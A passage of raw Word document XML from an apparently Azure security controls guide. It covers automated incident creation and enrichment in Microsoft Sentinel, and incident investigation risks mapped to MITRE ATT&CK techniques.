        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Automatic enrichment of Defender alerts with additional context including user behavior analytics, threat intelligence, and related security events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7018BAC2" w14:textId="2E1CB927" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Cross-Workload Correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620AC9A2" w14:textId="77777777" w:rsidR="00B9634E" w:rsidRPr="00B9634E" w:rsidRDefault="00B9634E" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B9634E">
        <w:t>Correlation of alerts across multiple Azure workloads and services to identify coordinated attacks and complex threat patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F2773E" w14:textId="014C46F0" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Custom Analytics Rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0C26A0" w14:textId="77777777" w:rsidR="00B9634E" w:rsidRPr="00B9634E" w:rsidRDefault="00B9634E" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="459"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B9634E">
        <w:t>Advanced KQL-based analytics rules for organization-specific threat detection patterns and business logic correlation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26526BDD" w14:textId="28D31044" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Threat Hunting Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B42985" w14:textId="5A3BADD0" w:rsidR="00D34DC9" w:rsidRDefault="00D34DC9" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="414"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00D34DC9">
        <w:t>Integration of Defender alerts with Microsoft Sentinel threat hunting capabilities for proactive threat investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04174E1D" w14:textId="77777777" w:rsidR="009607F6" w:rsidRDefault="009607F6" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3960"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C32044" w14:textId="77777777" w:rsidR="00B9634E" w:rsidRDefault="00B9634E" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3960"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39B326EF" w14:textId="77777777" w:rsidR="00B9634E" w:rsidRDefault="00B9634E" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3960"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18E06DA4" w14:textId="77777777" w:rsidR="00B9634E" w:rsidRDefault="00B9634E" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="3960"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14872329" w14:textId="79B57CCF" w:rsidR="009607F6" w:rsidRDefault="00B3395A" w:rsidP="009607F6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IR-3.3: Implement automated incident creation and enrichment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328F9933" w14:textId="77777777" w:rsidR="009607F6" w:rsidRDefault="009607F6" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>Transform alerts into actionable incidents through automation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108C8911" w14:textId="57936A3C" w:rsidR="009607F6" w:rsidRPr="009607F6" w:rsidRDefault="009607F6" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="415"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t>Implement Microsoft Sentinel automated incident creation with intelligent enrichment, classification, and stakeholder assignment for consistent management and response effectiveness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B70626" w14:textId="12EEEBCF" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="220"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Automated incident creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE8A66" w14:textId="7474526E" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Analytics rule configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4291C7D5" w14:textId="69008AA7" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Comprehensive analytics rules for converting high-quality alerts into incidents with appropriate severity levels and classification criteria</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F46766" w14:textId="2CB5AFB5" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Incident Grouping Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A2023F" w14:textId="49DCCECC" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Intelligent grouping of related alerts into single incidents to prevent fragmentation and ensure comprehensive investigation scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EDD1B6" w14:textId="169B3D30" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Entity Mapping and Enrichment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC399F0" w14:textId="28484387" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="416"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Automatic extraction and mapping of entities (users, hosts, IP addresses, files) with enrichment from threat intelligence and historical data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A232F9A" w14:textId="4DCDBFAF" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="220"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Microsoft Sentinel incident management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550B5E08" w14:textId="1DAD810B" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Incident timeline creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70515C53" w14:textId="0D7114DF" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Automatic generation of incident timelines with related alerts, user activities, and system events for comprehensive investigation context</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6563B430" w14:textId="7F10A47B" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Evidence Collection Automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2B8D83" w14:textId="4C1F5FF7" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Automated collection of relevant evidence including system logs, user activities, network flows, and file hashes for investigation support</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A1E06C" w14:textId="7F6BA6C1" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Collaboration Tools Integration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE74685" w14:textId="4ED5EBFC" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:ind w:left="1530"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Integration with Microsoft Teams, ServiceNow, and other collaboration platforms for seamless incident communication and coordination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FEEB1A" w14:textId="1F1638EE" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>SLA and Metrics Tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7420A5A1" w14:textId="2A421956" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Automated tracking of incident response SLAs including time to acknowledgment, time to investigation, and time to resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664567A3" w14:textId="7C501D40" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Playbook Automation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48891069" w14:textId="33A802BE" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B9634E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="417"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Triggered playbook execution for common incident types including automated containment, evidence collection, and stakeholder notification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECCECA0" w14:textId="77777777" w:rsidR="00871F9C" w:rsidRDefault="00871F9C" w:rsidP="00871F9C"/>
    <w:p w14:paraId="25CD25B5" w14:textId="77777777" w:rsidR="00871F9C" w:rsidRDefault="00871F9C" w:rsidP="00871F9C"/>
    <w:p w14:paraId="25F4BE13" w14:textId="77777777" w:rsidR="00871F9C" w:rsidRDefault="00871F9C" w:rsidP="00871F9C"/>
    <w:p w14:paraId="3213A835" w14:textId="41BA3FA3" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00B3395A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc242449539"/>
      <w:r w:rsidRPr="00B3395A">
        <w:lastRenderedPageBreak/>
        <w:t>IR-4: Detection and analysis - investigate an incident</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
    </w:p>
    <w:p w14:paraId="1E663B4D" w14:textId="582313DF" w:rsidR="00B3395A" w:rsidRDefault="00B3395A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20098BD5" w14:textId="022479F6" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00FB3909">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Implement comprehensive incident investigation capabilities using Azure-native security services, forensic tools, and systematic investigation procedures to ensure complete understanding of attack scope, evidence preservation, and effective containment planning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392AB0CB" w14:textId="2CC0ED75" w:rsidR="00B3395A" w:rsidRDefault="00B3395A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B3395A">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="585A27BB" w14:textId="4B192F22" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Incomplete attack scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A4DE7C" w14:textId="68F527BE" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Limited visibility into progression, lateral movement, and data access prevents containment and allows hidden footholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CFEFDCD" w14:textId="28C36E4C" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Unknown data exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672E999F" w14:textId="3B0FADB5" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Failure to identify accessed, modified, or exfiltrated data creates compliance violations and prevents accurate breach notification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C310831" w14:textId="44AE8CD3" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Missed attack persistence mechanisms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53458E85" w14:textId="4F226FBD" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Inadequate investigation fails to identify backdoors, scheduled tasks, registry modifications, or other persistence mechanisms, allowing attackers to regain access after initial remediation efforts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E9CB0F" w14:textId="5DBCE7BA" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Evidence destruction and tampering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9006EA" w14:textId="2C69F17D" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Lack of proper evidence preservation procedures allows critical forensic evidence to be overwritten, modified, or deleted during investigation, compromising legal proceedings and root cause analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07398BEC" w14:textId="6556F2D6" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Extended dwell time and damage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9149C1" w14:textId="0FE9F325" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Ineffective investigation prolongs attacker presence in the environment, increasing data exposure, system damage, and business impact while undermining confidence in security controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0F838B" w14:textId="5E5A80A3" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Recurring incidents from incomplete remediation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6897D464" w14:textId="0D0EB983" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="223"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t xml:space="preserve">Failure to identify all attack vectors and entry points results in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B3395A">
        <w:t>recompromise</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B3395A">
        <w:t xml:space="preserve"> through the same vulnerabilities and attack pa</w:t>
      </w:r>
      <w:r>
        <w:t>ths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D480331" w14:textId="4E00BAE5" w:rsidR="00B3395A" w:rsidRDefault="00B3395A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="222"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A006F4B" w14:textId="28BFF4CA" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001E43D1" w14:textId="3E0939BD" w:rsidR="00711706" w:rsidRDefault="00711706" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00711706">
        <w:t>indicator removal (T1070) deleting logs and evidence to prevent investigation and analysis of attack methods and scope.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20EA11C9" w14:textId="75B35D4C" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3540F88B" w14:textId="6C07D43A" w:rsidR="00711706" w:rsidRDefault="00711706" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4050"/>
        </w:tabs>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00711706">
        <w:t>file deletion (T1070.004) removing malicious files and artifacts before forensic collection can preserve evidence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B50EA99" w14:textId="13A6ACD7" w:rsidR="00B3395A" w:rsidRDefault="00B3395A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3395A">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCA0BC4" w14:textId="1515DD87" w:rsidR="00711706" w:rsidRDefault="00711706" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00711706">
        <w:lastRenderedPageBreak/>
        <w:t>hidden files and directories (T1564.001) concealing backdoors and persistence mechanisms from superficial investigation efforts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E89A43C" w14:textId="21FEDE0A" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CB9058" w14:textId="5C5EE9A5" w:rsidR="00711706" w:rsidRDefault="00711706" w:rsidP="00871F9C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="418"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00711706">
        <w:t>system information discovery (T1082) gathering system information to understand investigation capabilities and avoid detection mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CFC0C7" w14:textId="77777777" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00D9595A"/>
    <w:p w14:paraId="6E6983E3" w14:textId="2D3D8D4E" w:rsidR="00D9595A" w:rsidRDefault="00D9595A" w:rsidP="00D9595A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D9595A">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IR-4.1: Implement comprehensive log collection and analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6847AB32" w14:textId="77777777" w:rsidR="00645387" w:rsidRDefault="00645387" w:rsidP="00FB3909">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
